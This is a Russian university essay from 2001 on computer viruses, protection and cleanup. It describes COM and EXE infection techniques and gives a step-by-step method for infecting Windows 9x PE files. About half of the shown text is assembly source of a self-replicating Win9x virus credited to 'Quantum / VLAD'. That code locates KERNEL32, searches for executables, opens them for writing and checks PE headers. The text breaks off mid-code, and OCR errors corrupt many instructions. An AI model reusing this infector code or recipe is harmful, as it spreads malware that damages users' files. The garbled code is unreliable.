Компьютерные вирусы
Компьютерные вирусы
МИНИСТЕРСТВО ОБРАЗОВАНИЯ РОССИЙСКОЙ ФЕДЕРАЦИИ
ТАГАНРОГСКИЙ РАДИОТЕХНИЧЕСКИЙ УНИВЕРСИТЕТ
РЕФЕРАТ
по курсу «Основы эксплуатации ЭВМ»
тема: «Компьютерные вирусы, методы защиты,
профилактика и лечение»
Выполнил :
Шуев С.Б.
Проверил :
Евтеев Г.Н.
ТАГАНРОГ, 2001
ВВЕДЕНИЕ
При работе с современным персональным компьютером пользователя (а
особенно начинающего) может подстерегать множество неприятностей: потеря
данных, зависание системы, выход из строя отдельных частей компьютера и
другие. Одной из причин этих проблем наряду с ошибками в программном
обеспечении) и неумелыми действиями самого оператора ПЭВМ могут быть
проникшие в систему компьютерные вирусы. Эти программы подобно
биологическим вирусам размножаются, записываясь в системные области диска
или приписываясь к файлам и производят различные нежелательные действия,
которые, зачастую, имеют катастрофические последствия. Чтобы не стать
жертвой этой напасти, каждому пользователю следует хорошо знать принципы
защиты от компьютерных вирусов.
В литературе весьма настойчиво пропагандируется, что избавиться от
вирусов можно лишь при помощи сложных (и дорогостоящих) антивирусных
программ, и якобы только под их защитой вы сможете чувствовать себя в
полной безопасности. Это не совсем так – знакомство с особенностями
строения и способами внедрения компьютерных вирусов поможет вовремя их
обнаружить и локализовать, даже если под рукой не окажется подходящей
антивирусной программы.
COM – вирусы.
Рассмотрим два варианта внедрения COM- вируса.
Вариант первый. Вирус переписывает начало программы в конец файла, чтобы
освободить место для себя. После этого тело вируса записывается в начало
файла, а небольшая его часть, обеспечивающая перенос вытесненного фрагмента
программы, на прежнее место – в конец. При восстановлении первоначального
вида программы тело вируса будет затерто, поэтому код вируса,
восстанавливающий программу, должен находиться в безопасном месте, отдельно
от основного тела вируса. Этот способ внедрения изображен на рис. 1.
Начало программы
переписывается в
конец файла,
освобождая место для
вируса
Тело вируса
записывается в начало
файла, а часть вируса
обеспечивающая
восстановление
программы – в конец
Рис. 1
При загрузке зараженного таким способом файла управление получит вирус (так
как он находится в начале файла и будет загружен с адреса 100h). После
окончания работы вирус передает управление коду, переносящему вытесненную
часть программы на прежнее место. После восстановления (в памяти, не в
файле) первоначального вида программы, она запускается. Схема работы вируса
изображена на рис. 2.
Второй вариант отличается от первого тем, что вирус, освобождая для себя
место, сдвигает все тело программы, а не переносит ее часть в конец файла.
Этот способ внедрения изображен на рис. 3. После запуска зараженной
программы, как и в предыдущем случае, управление получает вирус.
Отработав,
вирус передает
управление
своему коду в
конце
программы.
Восстанавливает
ся
первоначальный
вид программы
После
восстановления
вирус
запускает
программу
Рис.2
Дальнейшая работа вируса отличается только тем, что часть вируса,
восстанавливающая первоначальный вид программы, переносит к адресу 100h все
тело программы, а не только вытесненную часть. Схема работы вируса,
заражающего файл таким образом, приведена на рис. 4.
Тело программы сдвигается
ближе к концу файла,
освобождая место для вируса
Тело вируса записывается в
начало файла, а часть вируса,
обеспечивающая восстановление
программы – в конец
рис. 3
Отработав, вирус
передает управление
своему коду в конце
программы.
Восстанавливается
первоначальный вид
программы – тело
программы сдвигается
к адресу 0100h
После восстановления
вирус запускает
программу
рис. 4
EXE – вирусы
EXE – вирусы условно можно разделить на группы, используя в качестве
признака для деления особенности алгоритма.
Вирусы, замещающие программный код (Overwrite).
Такие вирусы уже стали раритетом. Их главный недостаток – слишком
грубая работа. Инфицированные программы не исполняются, так как вирус
записывается поверх программного кода, не сохраняя его. При запуске вирус
ищет очередную жертву (или жертвы), открывает найденный файл для
редактирования и записывает свое тело в начало программы, не сохраняя
оригинальный код. Инфицированные этими вирусами программы лечению не
подлежат.
Вирусы – спутники (Companion).
Эти вирусы получили свое название из-за алгоритма размножения: к
каждому инфицированному файлу создается файл – спутник. Рассмотрим более
подробно два типа вируса этой группы:
Вирусы первого типа размножаются следующим образом. Для каждого
инфицируемого EXE – файла в том же каталоге создается файл с вирусным
кодом, имеющим такое же имя, что и EXE – файл, но с расширением СОМ. Вирус
активизируется, если при запуске программы в командной строке указано
только имя исполняемого файла. Дело в том, что, если не указано расширение
файла, DOS сначала ищет в текущем каталоге файл с заданным именем и
расширением СОМ. Если СОМ – файл с таким именем не найден, ведется поиск
одноименного ЕХЕ – файла. Если не найден и ЕХЕ – файл, DOS попробует
обнаружить и ВАТ (пакетный) файл. В случае отсутствия в текущем каталоге
исполняемого файла с указанным именем поиск ведется во всех каталогах,
доступных по переменной РАТН. Другими словами, когда пользователь хочет
запустить программу и набирает в командной строке только ее имя (в основном
так все и делают ), первым управление получает вирус, код которого
находится в СОМ – файле. Он создает СОМ – файл еще к одному или нескольким
ЕХЕ – файлам (распространяется), а затем исполняет ЕХЕ – файл с указанным в
командной строке именем. Пользователь же думает, что работает только
запущенная ЕХЕ – программа. Вирус – спутник обезвредить довольно просто –
достаточно удалить СОМ – файл.
Вирусы второго типа действуют более тонко. Имя инфицируемого ЕХЕ –
файла остается прежним, а расширение заменяется каким – либо другим,
отличным от исполняемого (СОМ, ЕХЕ и ВАТ). Например файл может пллучить
расширение DAT (файл данных) или OVL (программный оверлей). Затем на место
ЕХЕ – файла копируется вирусный код. При запуске такой инфицированной
программы управление получает вирусный код, находящийся в ЕХЕ – файле.
Инфицировав еще один или несколько ЕХЕ – файлов таким же образом, вирус
возвращает оригинальному файлу исполняемое расширение (но не ЕХЕ, а СОМ,
посколько ЕХЕ – файл стаким именем занят вирусом), после чего исполняет
его. Когда работа инфицированной программы закончена, ее запускаемому файлу
возвращается расширение неисполняемого. Лечение файлов, зараженных вирусом
этого типа, может быть затруднено, если вирус – спутник шифрует часть или
все тело инфицируемого файла, а перед исполнением его расшифровывает.
Вирусы, внедряющиеся в программу (Parasitic)
Вирусы этого вида самые незаметные: их код записывается в инфицируемую
программу, что существенно затрудняет лечение зараженных файлов. Рассмотрим
методы внедрения ЕХЕ - вирусов в ЕХЕ - файл.
Способы заражения ЕХЕ – файлов.
Самый распространенный способ заражения ЕХЕ – файлов такой: в конец
файла дописывается тело вируса, а заголовок корректируется (с сохранением
оригинального) так, чтобы при запуске инфицированного файла управление
получал вирус. Похоже на заражение СОМ – файлов, но вместо задания в коде
перехода в начало вируса корректируется собственно адрес точки запуска
программы. После окончания работы вирус берет из сохраненного заголовка
оригинальный адрес запуска программы, прибавляет к его сегментной
компоненте значение регистра DS или ES (полученное при старте вируса) и
передает управление на полученный адрес.
Следующий способ – внедрение вируса в начало файла со сдвигом кода
программы. Механизм заражения такой: тело инфицируемой программы
считывается в память, на ее место записывается вирусный код, а после него –
код инфицируемой программы. Таким образом, код программы как бы
«сдвигается» в файле на длину кода вируса. Отсюда и название способа –
«способ сдвига». При запуске инфицированного файла вирус заражает еще один
или несколько файлов. После этого он считывает в память код программы,
записывает его в специально созданный на диске временный файл с расширением
исполняемого файла (СОМ или ЕХЕ), и затем исполняет этот файл. Когда
программа закончила работу, временный файл удаляется. Если при создании
вируса не применялось дополнительных приемов защиты, то вылечить
инфицированный файл очень просто – достаточно удалить код вируса в начале
файла, и программа снова будет работоспособной. Недостаток этого метода в
том, что приходиться считывать в память весь код инфицируемой программы (а
бывают экземпляры размером больше 1 Мбайт).
Следующий способ заражения файлов – метод переноса – по всей видимости,
является самым совершенным из всех перечисленных. Вирус размножается
следующим образом: при запуске инфицируемой программы тело вируса из нее
считывается в память. Затем ведется поиск неинфицированной программы. В
память считывается ее начало, по длине равную телу вируса. На это место
записывается тело вируса. Начало программы из памяти дописывается в конец
файла. Отсюда название метода – «метод переноса». После того, как вирус
инфицировал один или несколько файлов, он приступает к исполнению
программы, из которой запустился. Для этого он считывает начало
инфицированной программы, сохраненное в конце файла, и записывает его в
начало файла, восстанавливая работоспособность программы. Затем вирус
удаляет код начала программы из конца файла, восстанавливая оригинальную
длину файла, и исполняет программу. После завершения программы вирус вновь
записывает свой код в начало файла, а оригинальное начало программы - в
конец. Этим методом могут быть инфицированы даже антивирусы, которые
проверяют свой код на целостность, так как запускаемая вирусом программа
имеет в точности такой же код, как и до инфицирования.
Вирусы под Windows 9x.
Формат Portable Executable используется Win 32, Windows NT , Windows
95, Windows 98, что делает его очень популярным, и в будущем, возможно он
станет доминирующим форматом ЕХЕ. Этот формат значительно отличается от NE
– executable, используемого в Windows 3.11.
Вызов Windows API.
Обычные приложения вызывают Windows API (Application Program Interface)
используя таблицу импортируемых имен. Когда приложение загружено, данные,
необходимые для вызова API, заносятся в эту таблицу. В Windows 9x,
благодаря предусмотрительности фирмы – производителя Microsoft,
модифицировать таблицу импортируемых имен невозможно. Это проблема решается
непосредственным вызовом KERNEL32. То есть необходимо полностью
игнорировать структуру вызова и перейти непосредственно на точку входа DLL.
Чтобы получить описатель (Handle) DLL/ЕХЕ, можно использовать вызов
АРI GetModuleHandle или другие функции для получения точек входа модуля,
включая функцию получения адреса API GetProcAddress.
Как вызывать API, имея возможность вызывать его и в то же время такой
возможности не имея? Ответ: вызывать API, расположение которого в памяти
известно – это API в файле KERNEL32.DLL, он находится по постоянному
адресу.
Вызов API приложениями выглядит приблизительно так:
сall API_FUNCTION_NAME
например:
call CreateFileA
После компиляции этот вызов выглядит так:
db 9Ah ; инструкция call
dd ???? ;смещение в таблице переходов
Код в таблице переходов похож на такой:
jmp far [offset into import table]
Смещение в таблице импортируемых имен содержит адрес диспетчера для данной
функции API. Этот адрес можно получить с помощью GetProcAddress API.
Диспетчер функций выглядит так:
push function value
call Module Entrypoint
Зная точки входа, можно вызывать их напрямую, минуя таблицу этого
модуля. Поэтому можно заменить вызовы KERNEL32.DLL в его стандартной точке
на вызовы непосредственно функций. Просто сохраняем в стеке значение
функции и вызываем точку входа в модуль.
Модуль KERNEL32.DLL располагается в памяти статически – именно так и
предполагалось. Но конкретное место его расположения в разных версиях
Windows 9x отличается. Это было проверено. Оказалось, что одна функция
(получение времени/даты) отличается номером. Для компенсации этих различий
добавлена проверка двух различных мест на наличие KERNEL32.DLL. Но если
KERNEL32.DLL все-таки не найден, вирус возвращает управление программе-
носителю.
Адреса и номера функции.
Для June Test Release KERNEL32.DLL находится по адресу 0BFF93B95h, для
August Release – по адресу 0BFF93C1Dh. Можно найти другие значения функции,
используя 32-битный отладчик. В таблице 1 приведены адреса функций, которые
нужны для работы вируса.
Таблица 1. Адреса некоторых функций KERNEL32.DLL
|Функция |Адрес в June Test |Адрес в August Test |
| |Release |Release |
|GetCurrentDir |BFF77744h |BFF77744h |
|SetCurrentDir |BFF7771Dh |BFF7771Dh |
|GetTime |BFF9D0B6h |BFF9D14Eh |
|MessageBox |BFF638D9h |BFF638D9h |
|FindFile |BFF77893h |BFF77893h |
|FindNext |BFF778CBh |BFF778CBh |
|CreateFile |BFF77817h |BFF77817h |
|SetFilePointer |BFF76FA0h |BFF76FA0h |
|ReadFile |BFF75806h |BFF75806h |
|WriteFile |BFF7580Dh |BFF7580Dh |
|CloseFile |BFF7BC72h |BFF7BC72h |
Соглашения о вызовах.
Windows 9x написан на языках С++ (в основном) и Assembler. И, хотя
соглашения о вызовах просты для применения, Microsoft их не использует. Все
АРI под Windows 9x используют Pascal Calling Convention. Пример – АРI,
описанный в файлах справки Visual C++:
FARPROC GetProcAddres (
HMODULE hModule, // описатель DLL-модуля
LPCSTR lpszProc // имя функции
);
На первый взгляд кажется, что достаточно лишь сохранить в стеке
описатель DLL-модуля (он стоит перед указателем на имя функции) и вызвать
API. Но это не так. Параметры, согласно Pascal Calling Convention, должны
быть сохранены в стеке в обратном порядке:
Push offset lpszProc
Push dword ptr [hModule]
Call GetProcAddress
Используя 32-битный отладчик, можно оттрасировать вызов и найти вызов
KERNEL32.DLL для каждого конкретного случая. Это позволит получить номер
функции и обойтись без необходимой для вызова таблицы импортируемых имен.
Заражение файлов формата PE – execuatable.
Определение положения начала РЕ – заголовка происходит аналогично
поиску начала NE – заголовка. Если смещение таблицы настройки адресов (поле
18h) в заголовке ЕХЕ – файла 40h или больше, то по смещению 3Ch находится
смещение PE – execuatable заголовка. Сигнатура PE – execuatable («РЕ»)
находится, как и у NE – execuatable ЕХЕ – файла, в начале нового заголовка.
Внутри PE – заголовка находится таблица объектов. Ее формат наиболее
важен по сравнению с прочими. Для добавления вирусного кода в носитель и
перехвата вирусом управления необходимо добавить элемент в таблицу
объектов.
Основные действия заражения PE – execuatable файла:
1. Найти смещение заголовка PE – execuatable в файле.
2. Считать достаточное количество информации из заголовка для
вычисления его полного размера.
3. Считать весь PE – заголовок и таблицу объектов.
4. Добавить новый объект в таблицу объектов.
5. Установить точку входа RVA на новый объект.
6. Дописать вирус к файлу по вычисленному физическому смещению.
7. Записать измененный РЕ – заголовок в файл.
Для определения расположения таблицы объектов следует воспользоваться
значением переменной «HeaderSize» (не путать с «NT headersize»), которая
содержит совместный размер заголовков DOS, PE и таблицы объектов.
Для чтения таблицы объектов необходимо считать HeaderSize байт от
начала файла.
Таблица объектов расположена непосредственно за NT – заголовком.
Значение «NTheadersize» показывает количество байт, следующих за полем
«flags». Итак, для определения смещения таблицы объектов нужно получить
NТheadersize и добавить размер поля флагов (24).
Добавление объекта: получив количество объектов, умножить его на 40
(размер элемента таблицы объектов). Таким образом определяется смещение, по
которому будет расположен вирус.
Данные для элемента таблицы объектов должны быть вычислены с
использованием информации в предыдущем элементе (элементе носителя).
RVA=((prev RVA+ prev Virtual Size)/OBJ Alignment+1)
*OBJ Alignment
Virtual Size=((size of virus+buffer any space)/OBJ Alignment+1)
*OBJ Alignment
Physical Size=(size of virus/File Alignment+1)*File Alignment
Physical Offset=prev Physical Offset+prev Physical Size
Object Flags=db 40h,0,0,C0h
Entrypoint RVA=RVA
Теперь необходимо увеличить на единицу поле «количество объектов» и
записать код вируса по вычисленному «физическому смещению» в размере
физического размера байт.
Пример вируса под Windows 9x.
.386
locals
jumps
.model flat,STDCALL
include win32.inc ;некоторые 32-битные константы и структуры
L equ
;Определим внешние функции, к которым будет
подключаться вирус
extrn BeginPaint:PROC
extrn CreateWindowExA:PROC
extrn DefWindowProcA:PROC
extrn DispatchMessageA:PROC
extrn EndPaint:PROC
extrn ExitProcess:PROC
extrn FindWindowA:PROC
extrn GetMessageA:PROC
extrn GetModuleHandleA:PROC
extrn GetStockObject:PROC
extrn InvalidateRect:PROC
extrn LoadCursorA:PROC
extrn LoadIconA:PROC
extrn MessageBeep:PROC
extrn PostQuitMessage:PROC
extrn RegisterClassA:PROC
extrn ShowWindow:PROC
extrn SetWindowPos:PROC
extrn TextOutA:PROC
extrn TranslateMessage:PROC
extrn UpdateWindow:PROC
;Для поддержки Unicode Win32 интерпретирует некоторые функции
;для ANSI или расширенного набора символов.
;В качестве примера рассмотрим ANSI
CreateWindowEx equ
DefWindowProc equ
DispatchMessage equ
FindWindow equ
GetMessage equ
GetModuleHandle equ
LoadCursor equ
LoadIcon equ
MessageBox equ
RegisterClass equ
TextOut equ
.data
newhwnd dd 0
lppaint PAINTSTRUCT
msg MSGSTRUCT
wc WNDCLASS
mbx_count dd 0
hInst dd 0
szTitleName db "Bizatch by Quantum / VLAD activated"
zero db 0
szAlternate db "more than once",0
szClassName db "ASMCLASS32",0
;Сообщение выводимое в окне
szPaint db "Left button pressed:"
s_num db "00000000h times.",0
;Размер сообщения
MSG_L EQU ($-offset szPaint)-1
.code
;Сюда обычно передается управление от загрузчика.
start:
;Получим HMODULE
push L 0
call GetModuleHandle
mov [hInst],eax
push L 0
push offset szClassName
call FindWindow
or eax,eax
jz reg_class
;Пространство для модификации строки заголовка
mov [zero]," "
reg_class:
;Инициализируем структуру WndClass
mov [wc.clsStyle],CS_HREDRAW+CS_VREDRAW+CS_GLOBALCLASS
mov [wc.clsLpfnWndProc],offset WndProc
mov [wc.clsCbClsExtra],0
mov [wc.clsCbWndExtra],0
mov eax,[hInst]
mov [wc.clsHInstance],eax
;Загружаем значок
push L IDI_APPLICATION
push L 0
call LoadIcon
mov [wc.clsHIcon],eax
;Загружаем курсор
push L IDC_ARROW
push L 0
call LoadCursor
mov [wc.clsHCursor],eax
;Инициализируем оставшиеся поля структуры WndClass
mov [wc.clsHbrBackground],COLOR_WINDOW+1
mov dword ptr [wc.clsLpszMenuName],0
mov dword ptr [wc.clsLpszClassName],offset szClassName
;Регистрирем класс окна
push offset wc
call RegisterClass
;Создаем окно
push L 0 ;lpParam
push [hInst] ;hInstance
push L 0 ;Меню
push L 0 ;hwnd родительского окна
push L CW_USEDEFAULT ;Высота
push L CW_USEDEFAULT ;Длина
push L CW_USEDEFAULT ;Y
push L CW_USEDEFAULT ;X
push L WS_OVERLAPEEDWINDOW ;Style
push offset szTitleName ;Title Style
push offset szClassName ;Class Name
push L 0 ;extra style
call CreateWindowEx
;Сохраняем HWND
mov [newhwnd],eax
;Отображаем окно на экране
push L SW_SHOWNORMAL
push [newhwnd]
call ShowWindow
;Обновляем содержимое окна
push [newhwnd]
call UpdateWindow
;Очередь сообщений
msg_loop:
;Прочитаем следующее сообщение из очереди
push L 0
push L 0
push L 0
push offset msg
call GetMessage
;Если функция GetMessage вернула нулевое значение,
;то завершаем обработку сообщений и выходим из
процесса
cmp ax,0
je end_loop
;преобразуем виртуальные коды клавиш в сообщения
клавиатуры
push offset msg
call TranslateMessage
;Предаем это сообщение назад в Windows
push offset msg
call DispatchMessage
;Переходим к следующему сообщению
jmp msg_loop
;Выходим из процесса
end_loop:
push [msg.msWPARAM]
call ExitProcess
;Обработка сообщений окна. Win32 требует сохранения регистров
;EBX, EDI, ESI. запишем эти регистры после "uses" в строке "proc"
;Это позволит Ассемблеру сохранить их
WndProc proc uses ebx edi esi,hwnd:DWORD, wmsg:DWORD,
wparam:DWORD, lparam:DWORD
LOCAL theDC:DWORD
;Проверим, какое сообщение получили, и перейдем к обработке
cmp [wmsg],WM_DESTROY
je wmdestroy
стр [wmsg],WM_RBUTTONDOWN
je wmrbuttondown
cmp [wmsg],WM_SIZE
je wmsize
cmp [wmsg],WM_CREATE
je wmcreate
cmp [wmsg],WM_LBUTTONDOWN
je wmlbuttondown
cmp [wmsg],WM_PAINT
je wmpaint
cmp [wmsg],WM_GETMINMAXINFO
je wmgetminmaxinfo
;Данная программа не обрабатывает это сообщение.
;Передадим его Windows,
;чтобы оно было обработано по умолчанию
jmp defwndproc
;Сообщение WM_PAINT (перерисовать содержимое окна)wmpaint:
;Подготовим окно для перерисовки
push offset Ippaint
push [hwnd]
call BeginPaint
mov [theDC], eax
;Переведем в ASCII-формат значение mbx_count, которое
;доказывает, сколько раз была нажата левая кнопка мыши
mov eax,[mbx_count]
mov edi, offset s_num
call HexWrite32
; Вывод строки в окно
push L MSG_L ;Длина строки
push offset szPaint ;Строка
push L 5 ;Y
push L 5 ;X
push [theDC] ;DC
call TextOut
;0бозначим завершение перерисовки окна
push offset Ippaint
push [hwnd]
call EndPaint
;Выходим из обработки сообщения
mov eax, 0
jmp finish
;Сообщение WM_CREATE (создание окна)
wmcreate:
; Выходим из обработки сообщения
mov eax, 0
jmp finish
;Сообщение, не обрабатываемое данной программой, передаем Windows
defwndproc:
push [Iparam]
push [wparam]
push [wmsg]
push [hwnd]
call DefWindowProc
; Выходим из обработки сообщения
jmp finish
;Сообщение WM_DESTROY (уничтожение окна)
wmdestroy:
; Закроем поток
push L О
call PostQuitMessage
;Выходим из обработки сообщения
mov eax, О
jmp finish
;Сообщение WMJ-BUTTONDOWN (нажата левая кнопка мыши)
wmlbuttondown:
inc [mbx_count]
;0бновим содержимое окна
push L 0
push L 0
push [hwnd]
call InvalidateRect
[Выходим из обработки сообщения
mov eax, О
jmp finish
;Сообщение WM_RBUTTONDOWN (нажата правая кнопка мыши)
wmrbuttondown:
push L 0
call MessageBeep
;Выходим из обработки сообщения
jmp finish
;Сообщение WM_SIZE (изменен размер окна)
wmsize:
;Выходим из обработки сообщения
mov eax, О
jmp finish
;Сообщение WM_GETMINMAXINFO (попытка изменить размер
;или положение окна)
wmgetminmaxinfo:
;Заполним структуру MINMAXINFO
mov ebx, [Iparam]
mov [(MINMAXINFO ptr. ebx).mintrackposition_x],350
mov [(MINMAXINFO ptr ebx).mintrackposition_y],60
;Выходим из обработки сообщения
mov eax, О
jmp finish
;Выходим из обработки сообщения
finish:
ret
WndProc endp
;Процедура перевода байта в ASCII-формат для печати. Значение,
;находящееся в регистре AL, будет записано в ASCII-формате
;по адресу ES-.EDI
HexWriteS proc
;Разделяем байт на полубайты и загружаем их в регистры АН и AL
mov ah,al
and al.0Fh
shr ah,4
;Добавляем 30h к каждому полубайту, чтобы регистры содержали коды
;соответствующих символов ASCII. Если число,
;записанное в полубайте, было больше 9,
;то значение в этом полубайте надо еще корректировать
or ax,3030h
;Меняем полубайты местами, чтобы регистр АН содержал младший
;полубайт, а регистр AL - старший
xchg al.ah
;Проверим, надо ли корректировать младший полубайт,
;если да - корректируем
cmp ah, 39h
ja @@4
;Проверим, надо ли корректировать старший полубайт,
;если да - корректируем
@@1:
cmp al,39h
ja @@3
;Сохраним значение по адресу ES:EDI
@@2:
stosw
ret
;Корректируем значение старшего полубайта
@@3:
sub al, 30h
add al, "A"-10
jmp @@2
;Корректируем значение младшего полубайта
@@4:
sub ah, 30h
add ah, "A"-10
jmp @@1
HexWriteS endp
; Процедура перевода слова в ASCII-формат для печати.
;Значение, находящееся в регистре АХ, будет записано
;в ASCII-формате по адресу ES:EDI
HexWrite16 proc
;Сохраним младший байт из стека
push ax
;Загрузим старший байт в регистр AL
xchg al,ah
;Переведем старший байт в ASCII-формат
call HexWriteS
;Восстановим младший байт из стека
pop ax
;Переведем младший байт в ASCII-формат
call HexWriteS
ret
HexWrite16 endp
;Процедура перевода двойного слова в ASCII-формат для печати.
;Значение, находящееся в регистре ЕАХ, будет записано
;в ASCII-формате по адресу ES:EDI
HexWrite32 proc
;Сохраним младшее слово из стека
push eax
;Загрузим старшее слово в регистр АХ
shr eax, 16
;Переведем старшее слово в ASCII-формат
call HexWrite16
;Восстановим младшее слово из стека
pop eax
;Переведем младшее слово в ASCII-формат
call HexWrite16
ret
HexWrite32 endp
;Сделаем процедуру WndProc доступной извне
public WndProc
ends
;Здесь начинается код вируса. Этот код переписывается из файла
;в файл. Все вышеописанное - всего лишь программа-носитель
vladseg segment para public "vlad"
assume cs:vladseg
vstart: *
;Вычислим текущий адрес
call recalc
recalc:
pop ebp
mov eax,ebp
db 2Dh ;Код команды SUB AX
subme dd 30000h+(recalc-vstart)
;Сохраним адрес в стеке
push eax
;Вычислим стартовый адрес вирусного кода
sub ebp,offset recalc
;Ищем KERNEL. Возьмем вторую известную нам точку KERNEL
mov eax,[ebp+offset kern2]
;Проверим ключ. Если ключа нет, перейдем к точке 1
cmp dword ptr [eax],5350FC9Ch
jnz notkern2
;KERNEL найден, точка 2
mov eax,[ebp+offset kern2]
jmp movit
;Точка 2 не подошла, проверим точку 1
notkern2:
; Возьмем адрес первой известной нам точки KERNEL
mov eax,[ebp+offset kern1]
;Проверим ключ, если ключа нет - выходим
cmp dword ptr [eax],5350FC9Ch
jnz nopayload
;KERNEL найден, точка 1
mov eax,[ebp+offset kern1]
;KERNEL найден, адрес точки входа находится в регистре EAX
movit:
;Сохраним адрес KERNEL
mov [ebp+offset kern],eax
cld
;3апомним текущую директорию
lea eax, [ebp+offset orgdir]
push eax
push 255
call GetCurDir
;Инициализируем счетчик заражений
mov byte ptr [ebp+offset countinfect],0
;Ищем первый файл
infectdir:
lea eax, [ebp+offset win32_data_thang]
push eax
lea eax, [ebp+offset fname]
push eax
call FindFile
;Сохраним индекс для поиска
mov dword ptr [ebp+offset searchhandle],eax
Проверим, найден ли файл. Если файл не найден,
;меняем директорию
cmp еах,-1
jz foundnothing
;0ткроем файл для чтения и записи
gofile:
push О
push dword ptr [ebp+offset fileattr] ;FILE_ATTRIBUTE_NORMAL
push 3 ;OPEN_EXISTING
push 0
push 0
push 80000000h+40000000h ;GENERIC_READ+GENERIC_WRITE
lea eax, [ebp+offset fullname]
push eax
call CreateFile
;Сохраним описатель файла
mov dword ptr [ebp+offset ahand],eax
;Проверим, не произошла ли ошибка.
;Если ошибка произошла, ищем следующий файл
сmр еах,-1
jz findnextone
;Доставим указатель позиции чтения/записи на поле
;со смещением РЕ-заголовка
push О
push О
push 3Ch
push dword ptr [ebp+offset ahand]
call SetFilePointer
;Считаем адрес РЕ-заголовка
push О
lea eax,[ebp+offset bytesread]
push eax
push 4
lea eax, [ebp+offset peheaderoffset]
push eax
push dword ptr [ebp+offset ahand]
call ReadFile
;Доставим указатель позиции чтения/записи на начало РЕ-заголовка
push 0
push 0
push dword ptr [ebp+offset peheaderoffset]
push dword ptr [ebp+offset ahand]
call SetFilePointer
;Считаем число байт, достаточное для вычисления полного размера
;РЕ-заголовка и таблицы объектов
push 0
lea eax, [ebp+offset bytesread]
push eax
push 58h
lea eax, [ebp+offset peheader]
push eax
push dword ptr [ebp+offset ahand]
call ReadFile
;Проверим сигнатуру. Если ее нет, закрываем
;этот файл и ищем следующий
cmp dword ptr [ebp+offset peheader], 00004550h;
jnz notape
;Проверим файл на зараженность. Если файл заражен,
;то закрываем этот файл и ищем следующий
cmp word ptr [ebp+offset peheader+4ch],OFOODh
jz notape
cmp dword ptr [ebp+offset 52],4000000h
jz notape
;Доставим указатель позиции чтения/записи на начало РЕ-заголовка
push 0
push 0
push dword ptr [ebp+offset peheaderoffset]
push dword ptr [ebp+offset ahand]
call SetFilePointer
;Считаем весь РЕ-заголовок и таблицу объектов
push О
lea eax, [ebp+offset bytesread]
push eax
push dword ptr [ebp+offset headersize]
lea eax, [ebp+offset peheader]
push eax
push dword ptr [ebp+offset ahand]
call ReadFile
Страницы: 1, 2
|